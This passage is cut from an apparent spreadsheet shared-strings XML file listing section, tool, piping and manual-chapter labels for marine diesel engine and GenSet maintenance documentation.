    <t>MAIN SECTION 17</t>
  </si>
  <si>
    <t>MS 58 TURNING WHEEL</t>
  </si>
  <si>
    <t>MS 59 TURNING GEAR</t>
  </si>
  <si>
    <t>MS 118 TOOLS-KEF ENGINES</t>
  </si>
  <si>
    <t>GUARD FOR FLYWHELL</t>
  </si>
  <si>
    <t>TURNING SAFETY DEVICE</t>
  </si>
  <si>
    <t>FUEL OIL FILT.+WASTE TRAY</t>
  </si>
  <si>
    <t>MS 63 CYLINDER LUBRICATOR</t>
  </si>
  <si>
    <t>TACHOMETER EQUIPMENT</t>
  </si>
  <si>
    <t>MAIN SECTION 43+92</t>
  </si>
  <si>
    <t>MAIN SECTION 93</t>
  </si>
  <si>
    <t>MAIN SECTION 142</t>
  </si>
  <si>
    <t>MAIN SECTION 143</t>
  </si>
  <si>
    <t>CHARGING AIR COOLER MS-42</t>
  </si>
  <si>
    <t>CHARGING AIR COOLER MS-93</t>
  </si>
  <si>
    <t>MAIN SECTION 52+85</t>
  </si>
  <si>
    <t>MAIN SECTION 51+82</t>
  </si>
  <si>
    <t>MAIN SECTION 47</t>
  </si>
  <si>
    <t>MAIN SECTION 48</t>
  </si>
  <si>
    <t>MAIN SECTION 49</t>
  </si>
  <si>
    <t>MAIN SECTION 50</t>
  </si>
  <si>
    <t>MAIN SECTION 148</t>
  </si>
  <si>
    <t>GUARDS AT CAMSHAFT</t>
  </si>
  <si>
    <t>COOLER ARR.</t>
  </si>
  <si>
    <t>PLATFORM ARR.-LOWER-MAN.</t>
  </si>
  <si>
    <t>PLATFORM ARR.-LOWER-EXH.</t>
  </si>
  <si>
    <t>GALL.BRACK.ARR-EXH.</t>
  </si>
  <si>
    <t>MS 71 THRUST BEARING</t>
  </si>
  <si>
    <t>THRUST BEARING-CLOCKWISE</t>
  </si>
  <si>
    <t>THRUST BRG-ANTICLOCKWISE</t>
  </si>
  <si>
    <t>SEGMENT-CLOCKWISE</t>
  </si>
  <si>
    <t>SEGMENT-ANTICLOCKWISE</t>
  </si>
  <si>
    <t>ALARM FOR THRUST BEARING</t>
  </si>
  <si>
    <t>PIPES ON FORWARD END</t>
  </si>
  <si>
    <t>PIPES-AFT ON ENGINE</t>
  </si>
  <si>
    <t>PIPES-ALONGSIDE</t>
  </si>
  <si>
    <t>FUEL OIL HIGH-P.PIPES</t>
  </si>
  <si>
    <t>COOLING OIL PIPE-FUEL V.</t>
  </si>
  <si>
    <t>ALARM SYSTEM ARR.</t>
  </si>
  <si>
    <t>MAIN PIPE-FUEL O.RETURN</t>
  </si>
  <si>
    <t>MAIN PIPE-COOL.O.FUEL V.</t>
  </si>
  <si>
    <t>BRANCH PIPE-FUEL OIL</t>
  </si>
  <si>
    <t>PIPES-FUEL OIL</t>
  </si>
  <si>
    <t>DRAIN-GUARD AT FUEL VALVE</t>
  </si>
  <si>
    <t>PIPES FOR TURBOCHARGER</t>
  </si>
  <si>
    <t>PIPES ON FRAMES</t>
  </si>
  <si>
    <t>LUB.OIL PIPES-FORW.END</t>
  </si>
  <si>
    <t>PIPES-CAMSHAFT FRAME</t>
  </si>
  <si>
    <t>MAIN PIPE-OUTLET CAMSHAFT</t>
  </si>
  <si>
    <t>DRAIN PIPE-SCAV.AIR PIPE</t>
  </si>
  <si>
    <t>MAIN PIPE-L.O.TURBOCHAR.</t>
  </si>
  <si>
    <t>MAIN PIPE-LUB.O.CAMSHAFT</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN SCAV.BOX</t>
  </si>
  <si>
    <t>CENTRAL LUBRICATION-LOWER</t>
  </si>
  <si>
    <t>DRAIN PIPE-SCAVENGING BOX</t>
  </si>
  <si>
    <t>L.O.PIPE-THRUST BEARING</t>
  </si>
  <si>
    <t>VENTING-CHAIN BOX</t>
  </si>
  <si>
    <t>BRANCH-CYL.LUBRICATION</t>
  </si>
  <si>
    <t>PIPES FOR ST.AIR DISTRIB.</t>
  </si>
  <si>
    <t>STARTING ARRANGEMENT</t>
  </si>
  <si>
    <t>VARIOUS PIPES TURBOCHARG.</t>
  </si>
  <si>
    <t>COOL.W.PIPE-EXHAUST VALVE</t>
  </si>
  <si>
    <t>MAIN P.DRAIN FRES.COOL.W.</t>
  </si>
  <si>
    <t>COOL.W.PIPE-COOL.JACKET</t>
  </si>
  <si>
    <t>MAIN P.FRESH COOL.W.INLET</t>
  </si>
  <si>
    <t>MAIN PIPE-SALT COOL.WATER</t>
  </si>
  <si>
    <t>BRANCH PIPE FRESH WATER</t>
  </si>
  <si>
    <t>PIPES FOR COOLING WATER</t>
  </si>
  <si>
    <t>MS 901 TOOLS-CYL.COVER</t>
  </si>
  <si>
    <t>MS 903 TOOLS-CYL.LIN.+LUB</t>
  </si>
  <si>
    <t>MS 904 TOOLS-XHEAD W.ROD</t>
  </si>
  <si>
    <t>MS 905 TOOLS-CRANKSH.TH.B</t>
  </si>
  <si>
    <t>MS 906 TOOLS-MECH.CONT.G.</t>
  </si>
  <si>
    <t>MS 907 TOOLS-ST.AIR SYST.</t>
  </si>
  <si>
    <t>MS 9O8 TOOLS-EXH.VALVE</t>
  </si>
  <si>
    <t>MS 909 TOOLS-FUEL OIL SYS</t>
  </si>
  <si>
    <t>MS 911 TOOLS-SAFETY EQUIP</t>
  </si>
  <si>
    <t>MS 912 TOOLS-ASSY.L.PARTS</t>
  </si>
  <si>
    <t>MS 913 TOOLS-GENERAL</t>
  </si>
  <si>
    <t>MS 925 TOOLS-HYD.HOLD DWN</t>
  </si>
  <si>
    <t>PRE-ROTOR AND DIFFUSOR</t>
  </si>
  <si>
    <t>NOZZLE ASSEMBLY AND ROTOR</t>
  </si>
  <si>
    <t>TURBINE INLET AND OUTLET</t>
  </si>
  <si>
    <t>STATIONARY PARTS</t>
  </si>
  <si>
    <t>AIR COOLER</t>
  </si>
  <si>
    <t>MS 98 ST.AIR DISTRIBUTOR</t>
  </si>
  <si>
    <t>MAIN SECTION 57</t>
  </si>
  <si>
    <t>FIRE EXTINGUISHING-CO-2</t>
  </si>
  <si>
    <t>FIRE EXTINGUISHING-STEAM</t>
  </si>
  <si>
    <t>FIRE EXTING.-WATER MIST</t>
  </si>
  <si>
    <t>INSTRUCTION BOOK</t>
  </si>
  <si>
    <t>FRONT PAGE,LOGO</t>
  </si>
  <si>
    <t>FRONT PAGE, LOGO VOL.I</t>
  </si>
  <si>
    <t>FRONT PAGE, LOGO VOL.II</t>
  </si>
  <si>
    <t>FRONT PAGE, LOGO VOL.III</t>
  </si>
  <si>
    <t>INSTRUCTION</t>
  </si>
  <si>
    <t>INSTRUCTION, VOL.I</t>
  </si>
  <si>
    <t>INSTRUCTION, VOL.II</t>
  </si>
  <si>
    <t>INSTRUCTION, VOL.III</t>
  </si>
  <si>
    <t>DESCRIPTION,COMP.,VOL.III</t>
  </si>
  <si>
    <t>TABLE OF CONTENTS</t>
  </si>
  <si>
    <t>CHECKING &amp; MAINT.SCHEDULE</t>
  </si>
  <si>
    <t>SAFETY PRECAUTIONS</t>
  </si>
  <si>
    <t>SECTION INDEX,IB 900- 913</t>
  </si>
  <si>
    <t>INSTRUCTION BOOK VOL.I</t>
  </si>
  <si>
    <t>INSTRUCTION BOOK VOL.II</t>
  </si>
  <si>
    <t>FRONT PAGE, LOGO VOL-II</t>
  </si>
  <si>
    <t>INTRODUCTION, VOL-II.</t>
  </si>
  <si>
    <t>INSTRUCTION BOOK VOL.III</t>
  </si>
  <si>
    <t>INTRODUCTION, VOL. III</t>
  </si>
  <si>
    <t>FRONT PAGE,LOGO VOL.I-III</t>
  </si>
  <si>
    <t>INSTRUCTION, VOL.I,II,III</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATOR</t>
  </si>
  <si>
    <t>RECIPROCATING PARTS</t>
  </si>
  <si>
    <t>CRANKSHAFT DEFLECTIONS</t>
  </si>
  <si>
    <t>TACHO PICK-UPS</t>
  </si>
  <si>
    <t>CAMSHAFT BEARINGS</t>
  </si>
  <si>
    <t>REPLAC. OF CAMS ON CAMSH.</t>
  </si>
  <si>
    <t>CAMSHAFT COUPLING</t>
  </si>
  <si>
    <t>GEAR DRIVE</t>
  </si>
  <si>
    <t>HYDRAULIC PUMPS</t>
  </si>
  <si>
    <t>HYDRAULIC SYSTEM</t>
  </si>
  <si>
    <t>ACCUMULATORS</t>
  </si>
  <si>
    <t>CONTROL VALVES</t>
  </si>
  <si>
    <t>PICK-UP ARRANGEMENT</t>
  </si>
  <si>
    <t>SPECIAL RUNNING</t>
  </si>
  <si>
    <t>HIGH-PRESSURE PIPE</t>
  </si>
  <si>
    <t>EXHAUST VALVE ACTUATOR</t>
  </si>
  <si>
    <t>EXH. VALVE ROLLER GUIDE</t>
  </si>
  <si>
    <t>EXHAUST VALVE CAM</t>
  </si>
  <si>
    <t>EXH.VALVE SP.RUNNING,OPEN</t>
  </si>
  <si>
    <t>EXH. VALVE SPEC. RUNNING</t>
  </si>
  <si>
    <t>FUEL PUMP SETTINGS</t>
  </si>
  <si>
    <t>VIT SYSTEM</t>
  </si>
  <si>
    <t>FUEL PUMP CAM</t>
  </si>
  <si>
    <t>FUEL PUMP TOP COVER</t>
  </si>
  <si>
    <t>FUEL PUMP BARREL ASSEMBLY</t>
  </si>
  <si>
    <t>FUEL PUMP SUCTION VALVE</t>
  </si>
  <si>
    <t>FUEL PUMP PUNCTURE VALVE</t>
  </si>
  <si>
    <t>FUEL PUMP SHOCK ABSORBER</t>
  </si>
  <si>
    <t>LIFT. GEAR ROLLER GUIDE</t>
  </si>
  <si>
    <t>NON-RETURN VALVE F. PUMP</t>
  </si>
  <si>
    <t>FUEL OIL HP PIPES</t>
  </si>
  <si>
    <t>FUEL PUMP ROLLLER GUIDE</t>
  </si>
  <si>
    <t>FUEL PUMP SPEC. RUNNING</t>
  </si>
  <si>
    <t>AIR COOLER ELEMENT</t>
  </si>
  <si>
    <t>NON-RETURN VALVE TURBOCH.</t>
  </si>
  <si>
    <t>AUXILARY BLOWER</t>
  </si>
  <si>
    <t>TURBOCHARGER TURBINE</t>
  </si>
  <si>
    <t>SCAV.AIR REC.SAFETY VALVE</t>
  </si>
  <si>
    <t>H.D./END CHOCK BOLTS(IRON</t>
  </si>
  <si>
    <t>H.D./END CHOCK BOLTS(EPOX</t>
  </si>
  <si>
    <t>STAY BOLTS</t>
  </si>
  <si>
    <t>WORKING PLATFORMS</t>
  </si>
  <si>
    <t>S-INSTRUCTION</t>
  </si>
  <si>
    <t>INTRODUCTION</t>
  </si>
  <si>
    <t>CRANK PIN BEARING</t>
  </si>
  <si>
    <t>REPL. CAMS ON CAMSHAFT</t>
  </si>
  <si>
    <t>HIGH PRESS PIPE</t>
  </si>
  <si>
    <t>EXH.VALVE ACTUATOR</t>
  </si>
  <si>
    <t>FUEL PUMP TOPCOVER</t>
  </si>
  <si>
    <t>FUELPUMP BARREL ASSEMBLY</t>
  </si>
  <si>
    <t>FUELPUMP SUCTION VALVE</t>
  </si>
  <si>
    <t>FUELPUMP PUNCTURE VALVE</t>
  </si>
  <si>
    <t>FUEL PUMP, SHOCK ABSORBER</t>
  </si>
  <si>
    <t>BUTTERFLY VALVES</t>
  </si>
  <si>
    <t>TIGHTEN.TORQUES, STANDARD</t>
  </si>
  <si>
    <t>SCREWS AND NUTS</t>
  </si>
  <si>
    <t>HYDRAULIC RING</t>
  </si>
  <si>
    <t>LUBRICATING</t>
  </si>
  <si>
    <t>CROSS SECTION THROUGH ENG</t>
  </si>
  <si>
    <t>CYLINDER COVER PANEL</t>
  </si>
  <si>
    <t>CYL. COVER, GRINDING TOOLS</t>
  </si>
  <si>
    <t>CYL. COVER, SUPPORT TOOL</t>
  </si>
  <si>
    <t>CYL.COV.,HYDR.JACK SPARES</t>
  </si>
  <si>
    <t>CYL. COVER, LIFTING TOOLS</t>
  </si>
  <si>
    <t>PISTON AND PISTON ROD</t>
  </si>
  <si>
    <t>PISTON &amp; PISTON ROD PANEL</t>
  </si>
  <si>
    <t>PISTON &amp; ROD, TOOLS</t>
  </si>
  <si>
    <t>PISTON &amp; ROD, HYDR. TOOLS</t>
  </si>
  <si>
    <t>PISTON CROWN, HYDR. TOOLS</t>
  </si>
  <si>
    <t>PISTON &amp; ROD, EXTRA TOOLS</t>
  </si>
  <si>
    <t>PISTON &amp; ROD,SUPPORT TOOL</t>
  </si>
  <si>
    <t>PISTON, LIFTING TOOLS</t>
  </si>
  <si>
    <t>CYL. LINER &amp; COOL. JACKET</t>
  </si>
  <si>
    <t>CYLINDER FRAME, DETAILS</t>
  </si>
  <si>
    <t>CYLINDER LINER, DETAILS</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATORS</t>
  </si>
  <si>
    <t>CYL. LUBRICATOR, DETAILS</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATOR ASSY</t>
  </si>
  <si>
    <t>CYL. LUBR.SYSTEM, DETAILS</t>
  </si>
  <si>
    <t>CYL.FRAME, STUDS,EXH.SIDE</t>
  </si>
  <si>
    <t>ELECTRONIC.COMP. CYL.LUB.</t>
  </si>
  <si>
    <t>CYLINDER LINER, TOOLS</t>
  </si>
  <si>
    <t>CYL. LINER, EKSTRA TOOLS</t>
  </si>
  <si>
    <t>CYL. LINER, HONING TOOL</t>
  </si>
  <si>
    <t>TEST EQUIPM. LUBRICATORS</t>
  </si>
  <si>
    <t>CYL. LINER, LIFTING TOOLS</t>
  </si>
  <si>
    <t>CONN. ROD + CROSSHEAD</t>
  </si>
  <si>
    <t>CONN.ROD + CROSSH.DETAILS</t>
  </si>
  <si>
    <t>LUBR.AND COOLING OIL FLOW</t>
  </si>
  <si>
    <t>CONN.ROD + CROSSH., PANEL</t>
  </si>
  <si>
    <t>CONN. ROD, HYDR.TOOLS</t>
  </si>
  <si>
    <t>CONNECTING ROD, TOOLS</t>
  </si>
  <si>
    <t>CROSSHEAD,HYDRAULIC TOOLS</t>
  </si>
  <si>
    <t>CROSSHEAD, TOOLS</t>
  </si>
  <si>
    <t>ARRANGEMENT OF FORE END</t>
  </si>
  <si>
    <t>ARR. OF ANGLE ENCODER</t>
  </si>
  <si>
    <t>ARR. OF FORE END WITH PTO</t>
  </si>
  <si>
    <t>TRIGGER RING AND PICK-UPS</t>
  </si>
  <si>
    <t>TORS.VIBR. MONITOR SYSTEM</t>
  </si>
  <si>
    <t>TURNING GEAR, DETAILS</t>
  </si>
  <si>
    <t>TACHO EQUIPMENT</t>
  </si>
  <si>
    <t>CRANKSH, THRUSTSH., PANEL</t>
  </si>
  <si>
    <t>MAIN BEARING, HYDR.TOOLS.</t>
  </si>
  <si>
    <t>CRANKSHAFT, TOOLS</t>
  </si>
  <si>
    <t>SEGMENT STOP., HYDR.TOOLS</t>
  </si>
  <si>
    <t>CRANKSHAFT, MEAS. TOOLS</t>
  </si>
  <si>
    <t>MAIN BEARING, LIFT.TOOLS</t>
  </si>
  <si>
    <t>CRANKSHAFT, HYDR. TOOLS</t>
  </si>
  <si>
    <t>SEGM.STOP/VIBR.DAMP.,TOOL</t>
  </si>
  <si>
    <t>COUNTERWEIGHT, TOOLS</t>
  </si>
  <si>
    <t>TURN.-GEAR /WHEEL, TOOLS</t>
  </si>
  <si>
    <t>THRUST SHAFT, TOOLS</t>
  </si>
  <si>
    <t>MAIN BEARING SHELL, TOOLS</t>
  </si>
  <si>
    <t>MAIN BEARING, MEAS. TOOLS</t>
  </si>
  <si>
    <t>TUNING WHEEL, TOOLS</t>
  </si>
  <si>
    <t>AX.VIBR.DAMP, HYDR.TOOLS</t>
  </si>
  <si>
    <t>ARR. CHAIN DRIVE &amp; CAMSH.</t>
  </si>
  <si>
    <t>CHAIN DRIVE AND GUIDEBARS</t>
  </si>
  <si>
    <t>CHAIN DRIVE, LUBRICATION</t>
  </si>
  <si>
    <t>INTERMEDIATE CHAIN WHEEL</t>
  </si>
  <si>
    <t>CAMSHAFT AND CHAIN WHEEL</t>
  </si>
  <si>
    <t>ARR. INDICATOR SYSTEM</t>
  </si>
  <si>
    <t>ARRANGEMENT OF GOVERNOR</t>
  </si>
  <si>
    <t>LOAD TRANSMITTER</t>
  </si>
  <si>
    <t>ENG.-SIDE CONTROL CONSOLE</t>
  </si>
  <si>
    <t>ENG.-SIDE CONSOLE,DETAILS</t>
  </si>
  <si>
    <t>ARRANGEMENT OF LAYSHAFT</t>
  </si>
  <si>
    <t>CHAIN TIGHT,F.MOMENT COMP</t>
  </si>
  <si>
    <t>MOMENT COMP., LUBRICATION</t>
  </si>
  <si>
    <t>MOMENT COMPENS., HOUSING</t>
  </si>
  <si>
    <t>CH.DRIVE GUIDEBAR,UPPER P</t>
  </si>
  <si>
    <t>CH.DRIVE GUIDEBAR,LOWER P</t>
  </si>
  <si>
    <t>CHAIN DR. LUBRIC.,UPPER</t>
  </si>
  <si>
    <t>CHAIN DR. LUBRIC.,LOWER</t>
  </si>
  <si>
    <t>HYDR. CYL. UNIT, DETAILS</t>
  </si>
  <si>
    <t>HYDR. POWER SUPPLY, DRIVE</t>
  </si>
  <si>
    <t>H.P.S. DRIVE, DETAILS</t>
  </si>
  <si>
    <t>H.P.S. - ACCUMULATOR</t>
  </si>
  <si>
    <t>H.P.S., LOW PRESS SYSTEM</t>
  </si>
  <si>
    <t>H.P.S., HIGH PRESS SYSTEM</t>
  </si>
  <si>
    <t>ELECTR.COMP., ENG.CONTROL</t>
  </si>
  <si>
    <t>ELECTR.COMP.,LUB.OIL SYST</t>
  </si>
  <si>
    <t>ENG.CTRL.ROOM, COMPONENTS</t>
  </si>
  <si>
    <t>PNEUMATIC COMPONENTS</t>
  </si>
  <si>
    <t>CHAIN DRIVE, CAMSH. PANEL</t>
  </si>
  <si>
    <t>TOOLS, ELECTR. COMPONENTS</t>
  </si>
  <si>
    <t>CHAIN DR. CAMSHAFT, TOOLS</t>
  </si>
  <si>
    <t>CAMSHAFT, HYDRAULIC TOOLS</t>
  </si>
  <si>
    <t>CRANKSHAFT, PIN GAUGE</t>
  </si>
  <si>
    <t>CAMSHAFT COUPL.HYDR.TOOLS</t>
  </si>
  <si>
    <t>CAMSHAFT, PIN GAUGE</t>
  </si>
  <si>
    <t>MOMENT COMPENSATOR, TOOLS</t>
  </si>
  <si>
    <t>HYDR. TOOLS, CHAIN TIGHT.</t>
  </si>
  <si>
    <t>ST.AIR DISTRIBUTOR DRIVE</t>
  </si>
  <si>
    <t>CONTROL AIR SYSTEM</t>
  </si>
  <si>
    <t>EXHAUST VALVE, DETAILS</t>
  </si>
  <si>
    <t>EXH. VALVE, PIPE SYSTEM</t>
  </si>
  <si>
    <t>ARR. OF COOL. WATER PIPES</t>
  </si>
  <si>
    <t>ARR. OF FRESH WATER PIPES</t>
  </si>
  <si>
    <t>ARR.DRAIN PIPE FRESHWATER</t>
  </si>
  <si>
    <t>EXHAUST VALVE, PANEL</t>
  </si>
  <si>
    <t>EXH. VALVE, TOOLS</t>
  </si>
  <si>
    <t>EXH. VALVE, HYDR. TOOLS</t>
  </si>
  <si>
    <t>EXH. VALVE, EXTRA TOOLS</t>
  </si>
  <si>
    <t>EXH. VALVE,EXTRACTOR TOOL</t>
  </si>
  <si>
    <t>EXH. VALVE ACTUATOR,TOOLS</t>
  </si>
  <si>
    <t>FUEL PUMP GEAR</t>
  </si>
  <si>
    <t>FUEL PUMP GEAR - DETAILS</t>
  </si>
  <si>
    <t>FUEL PUMP, DETAILS</t>
  </si>
  <si>
    <t>INTERMEDIATE CHAIN WHEELS</t>
  </si>
  <si>
    <t>LIFTING DEVICE, FUEL PUMP</t>
  </si>
  <si>
    <t>FUEL PUMP-FLOW DIAGRAM</t>
  </si>
  <si>
    <t>FUEL VALVE FUNCTION</t>
  </si>
  <si>
    <t>HIGH-PRESSURE PIPES</t>
  </si>
  <si>
    <t>LIFT.DEV. FUEL PUMP CYL.1</t>
  </si>
  <si>
    <t>FUEL VALVE, FUEL P. PANEL</t>
  </si>
  <si>
    <t>FUEL VALVE, TOOLS</t>
  </si>
  <si>
    <t>FUEL P.SEALS, MOUNT.TOOLS</t>
  </si>
  <si>
    <t>FUEL PUMP, TOOLS</t>
  </si>
  <si>
    <t>GAS VALVE, TOOLS</t>
  </si>
  <si>
    <t>FUEL VALVE NOZZLE, TOOLS</t>
  </si>
  <si>
    <t>FUEL PUNCTURE VALVE,TOOLS</t>
  </si>
  <si>
    <t>FUEL VALVE, INSP. TOOLS</t>
  </si>
  <si>
    <t>FUEL PUMP, LIFTING TOOL</t>
  </si>
  <si>
    <t>PRESSURE TESTING OF VOC</t>
  </si>
  <si>
    <t>FUEL VALVE, EXTRA TOOLS</t>
  </si>
  <si>
    <t>CLEAN.TOOL, FUEL V.NOZZLE</t>
  </si>
  <si>
    <t>TEST TOOL, VOC VALVE</t>
  </si>
  <si>
    <t>TURBOCHARGER SYSTEM</t>
  </si>
  <si>
    <t>EXHAUST PIPES &amp; RECEIVER</t>
  </si>
  <si>
    <t>EXH. RECEIVER, DETAILS</t>
  </si>
  <si>
    <t>ARR. OF AUXILIARY BLOWER</t>
  </si>
  <si>
    <t>SEAL.AIR SYST,TURBOCHARG.</t>
  </si>
  <si>
    <t>AIR COOLER SYST, CLEANING</t>
  </si>
  <si>
    <t>AIR COOLER - FRAME</t>
  </si>
  <si>
    <t>ARR.FLOOR PL.SCAV.AIR REC</t>
  </si>
  <si>
    <t>CRANE BEAM FOR AIR COOLER</t>
  </si>
  <si>
    <t>AIR COOLER SYSTEM</t>
  </si>
  <si>
    <t>COOLER &amp; TURBOCH., PANEL</t>
  </si>
  <si>
    <t>TURBOCHARGER, PANEL</t>
  </si>
  <si>
    <t>TURBOCHARGER, PANEL K90MC</t>
  </si>
  <si>
    <t>TURBOCHARGER SYSTEM, TOOL</t>
  </si>
  <si>
    <t>TURBOCH.ROTOR, CLEANING</t>
  </si>
  <si>
    <t>AIR COOLER, TOOLS</t>
  </si>
  <si>
    <t>EXHAUST RECEIVER, TOOLS</t>
  </si>
  <si>
    <t>AIR COOLER, LIFTING TOOLS</t>
  </si>
  <si>
    <t>SAFETY VALVE, CYLINDER</t>
  </si>
  <si>
    <t>SAFETY VALVE, SCAV.AIR S.</t>
  </si>
  <si>
    <t>ARR. SAFETY CAP</t>
  </si>
  <si>
    <t>SAFETY VALVE TESTING DEV.</t>
  </si>
  <si>
    <t>ARR. OF STAY BOLTS</t>
  </si>
  <si>
    <t>FRAME BOX, DETAILS</t>
  </si>
  <si>
    <t>END SHIELDS</t>
  </si>
  <si>
    <t>ARR. PISTON COOLING</t>
  </si>
  <si>
    <t>H.D.+E-CHOCK BOLTS, IRON</t>
  </si>
  <si>
    <t>LARGE PARTS, TOOLS</t>
  </si>
  <si>
    <t>HY.TOOL,HD BOLTS EPOXY</t>
  </si>
  <si>
    <t>HY.TOOL,HD BOLTS IRON</t>
  </si>
  <si>
    <t>ACCESSORIES, HYDR. TOOLS</t>
  </si>
  <si>
    <t>TIGHTENING-UP INSTRUCTION</t>
  </si>
  <si>
    <t>LIFTING TOOLS, ETC.</t>
  </si>
  <si>
    <t>TORQUE SPANNERS</t>
  </si>
  <si>
    <t>PLIERS</t>
  </si>
  <si>
    <t>COMBINATION SPANNERS</t>
  </si>
  <si>
    <t>RING SLUGGING SPANNERS</t>
  </si>
  <si>
    <t>SPANNERS</t>
  </si>
  <si>
    <t>OPEN-ENDED SPANNERS</t>
  </si>
  <si>
    <t>SPANNERS, ETC.</t>
  </si>
  <si>
    <t>VMON SYSTEM,DOCUMENTATION</t>
  </si>
  <si>
    <t>ME-ECS PARAMETER SET</t>
  </si>
  <si>
    <t>AVM SYSTEM, DOCUMENTATION</t>
  </si>
  <si>
    <t>Warning</t>
  </si>
  <si>
    <t>Main data for GenSet</t>
  </si>
  <si>
    <t>Introduction</t>
  </si>
  <si>
    <t>Safety</t>
  </si>
  <si>
    <t>Cross section</t>
  </si>
  <si>
    <t>Key for eng. designation</t>
  </si>
  <si>
    <t>Designation of cylinders</t>
  </si>
  <si>
    <t>Engine rotation clockwise</t>
  </si>
  <si>
    <t>Code ident. for instr.</t>
  </si>
  <si>
    <t>Intro. to maint. progr.</t>
  </si>
  <si>
    <t>Plan. maint. prog. m.o.</t>
  </si>
  <si>
    <t>Plan. maint. prog. o.</t>
  </si>
  <si>
    <t>Ope. data and set points</t>
  </si>
  <si>
    <t>Data for pressure and tol.</t>
  </si>
  <si>
    <t>Data for torque moments</t>
  </si>
  <si>
    <t>Declaration of weight</t>
  </si>
  <si>
    <t>Ordering of spare parts</t>
  </si>
  <si>
    <t>Service letters</t>
  </si>
  <si>
    <t>Conversion table</t>
  </si>
  <si>
    <t>Basic symbols for piping</t>
  </si>
  <si>
    <t>Operating</t>
  </si>
  <si>
    <t>Out of service</t>
  </si>
  <si>
    <t>Starting-up after repair</t>
  </si>
  <si>
    <t>Low-load ope. on HFO</t>
  </si>
  <si>
    <t>O. eng. at low frequency</t>
  </si>
  <si>
    <t>Eng. perf. and cond.</t>
  </si>
  <si>
    <t>Eval. of comb. cond.</t>
  </si>
  <si>
    <t>Condensate amount</t>
  </si>
  <si>
    <t>Starting failures</t>
  </si>
  <si>
    <t>Faults in fuel oil system</t>
  </si>
  <si>
    <t>Dist. during running</t>
  </si>
  <si>
    <t>Ignition in crankcase</t>
  </si>
  <si>
    <t>Lub.oil specification</t>
  </si>
  <si>
    <t>Maint. of lub. oil con.</t>
  </si>
  <si>
    <t>Crit. f. c./exc. of lub. oil</t>
  </si>
  <si>
    <t>Lubricating points</t>
  </si>
  <si>
    <t>Lub. oil in base frame</t>
  </si>
  <si>
    <t>Fuel oil specification</t>
  </si>
  <si>
    <t>Fuel oil quality</t>
  </si>
  <si>
    <t>Analysis data</t>
  </si>
  <si>
    <t>Firing pressure comparison</t>
  </si>
  <si>
    <t>Fuel oil cleaning</t>
  </si>
  <si>
    <t>Fresh water system treat.</t>
  </si>
  <si>
    <t>Cylinder head</t>
  </si>
  <si>
    <t>Piston, c. rod and c. l.</t>
  </si>
  <si>
    <t>Cam. and cam. drive</t>
  </si>
  <si>
    <t>Ope. gear for valve</t>
  </si>
  <si>
    <t>Contr. and saf. Systems</t>
  </si>
  <si>
    <t>Instr. and aut.</t>
  </si>
  <si>
    <t>Lambda controller</t>
  </si>
  <si>
    <t>Converter for engine- and</t>
  </si>
  <si>
    <t>Com. from the GenSet</t>
  </si>
  <si>
    <t>Crank. and main bearings</t>
  </si>
  <si>
    <t>Engine frame</t>
  </si>
  <si>
    <t>Turbocharger system</t>
  </si>
  <si>
    <t>Cleaning t.c., water w.</t>
  </si>
  <si>
    <t>Clean. tc, dry clean. comp.</t>
  </si>
  <si>
    <t>Clean. tc, water w, turbine</t>
  </si>
  <si>
    <t>Compressed air system</t>
  </si>
  <si>
    <t>Internal fuel oil system</t>
  </si>
  <si>
    <t>Ball valve with actuator</t>
  </si>
  <si>
    <t>Int. Lub. oil system</t>
  </si>
  <si>
    <t>Lub. oil th. valve</t>
  </si>
  <si>
    <t>Lub. oil cooler</t>
  </si>
  <si>
    <t>Centrifugal bypass filter</t>
  </si>
  <si>
    <t>Int. cooling water system</t>
  </si>
  <si>
    <t>Cooling w. thermo. valve</t>
  </si>
  <si>
    <t>Resilient mounting</t>
  </si>
  <si>
    <t>Intro. to spare parts</t>
  </si>
  <si>
    <t>Eng. performance data</t>
  </si>
  <si>
    <t>Ch. of leak. from insp.h.</t>
  </si>
  <si>
    <t>Dis. of cyl. unit f. eng.</t>
  </si>
  <si>
    <t>Disass. of cyl. unit</t>
  </si>
  <si>
    <t>Ins. of inlet valves</t>
  </si>
  <si>
    <t>Rec. of  v. spindle seat</t>
  </si>
  <si>
    <t>Valve rotator</t>
  </si>
  <si>
    <t>Repl. of valve guide</t>
  </si>
  <si>
    <t>Ch/adj of safety valve</t>
  </si>
  <si>
    <t>Indicator valve</t>
  </si>
  <si>
    <t>Repl. Of sleeve f. fuel inj.</t>
  </si>
  <si>
    <t>Repl. of v. seat ring</t>
  </si>
  <si>
    <t>Mount. of cyl. head</t>
  </si>
  <si>
    <t>Insp. of cyl. h. c. w. s.</t>
  </si>
  <si>
    <t>Ass. of cyl. unit</t>
  </si>
  <si>
    <t>Mount. of cyl. u. in eng.</t>
  </si>
  <si>
    <t>Dism. of piston and con.rod</t>
  </si>
  <si>
    <t>Sep./as. of p. and p. rod</t>
  </si>
  <si>
    <t>Piston</t>
  </si>
  <si>
    <t>Connecting rod</t>
  </si>
  <si>
    <t>Mount. of piston and con.</t>
  </si>
  <si>
    <t>Hyd. tight. of con. r. s.</t>
  </si>
  <si>
    <t>Inspection and honing</t>
  </si>
  <si>
    <t>Repl. of cyl. Liner</t>
  </si>
  <si>
    <t>Grinding of seal face</t>
  </si>
  <si>
    <t>Dism. of piston and cyl.</t>
  </si>
  <si>
    <t>Check of cam. and cam. d.</t>
  </si>
  <si>
    <t>Insp. and repl. of cam. b.</t>
  </si>
  <si>
    <t>Adjustment of camshaft</t>
  </si>
  <si>
    <t>Measure of fuel pump lead</t>
  </si>
  <si>
    <t>Insp. of valve roller g.</t>
  </si>
  <si>
    <t>Insp. of fuel inj. roller guide</t>
  </si>
  <si>
    <t>Contr. and adj. of valve</t>
  </si>
  <si>
    <t>Func. test and adjustment</t>
  </si>
  <si>
    <t>Adj. and t. of on/off t.</t>
  </si>
  <si>
    <t>Func. test level s.</t>
  </si>
  <si>
    <t>Adjust. and test of press. t.</t>
  </si>
  <si>
    <t>Adjust. and test of temp. t.</t>
  </si>
  <si>
    <t>Function test of shutdown</t>
  </si>
  <si>
    <t>Moun. and adj. of pick-up</t>
  </si>
  <si>
    <t>Adjust. of lambda contr.</t>
  </si>
  <si>
    <t>Check main b. autolog</t>
  </si>
  <si>
    <t>Vibration damper</t>
  </si>
  <si>
    <t>Insp. of bearing shells</t>
  </si>
  <si>
